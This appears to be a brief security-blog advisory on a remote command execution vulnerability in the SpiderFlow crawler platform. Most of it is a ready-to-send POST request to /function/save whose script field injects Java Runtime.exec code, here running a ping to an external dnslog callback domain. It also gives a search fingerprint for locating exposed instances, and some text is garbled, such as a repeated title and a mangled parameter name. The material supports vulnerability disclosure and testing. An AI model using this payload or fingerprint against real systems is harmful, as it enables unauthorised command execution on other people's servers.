Spiderflow Save Remote Command Execution Vulnerability
Spiderflow Save Remote Command Execution Vulnerability
SpiderFlow save remote command execution vulnerability
Vulnerability Description
The SpiderFlow platform defines crawls in a flowchart way, and is a highly flexible and configurable crawl platform.
Official website: https://www.spiderflow.org/
Vulnerability Impact
SpiderFlow
Network surveying and mapping
title==”SpiderFlow”
Vulnerability reappears
Main page
Send request packet to execute command
1
2
3
POST /function/save
id=&name=cmd¶meter=yw&script=}Java.type('java.lang.Runtime').getRuntime().exec('ping chwd71.dnslog.cn');{
This post is licensed under CC BY 4.0 by the author.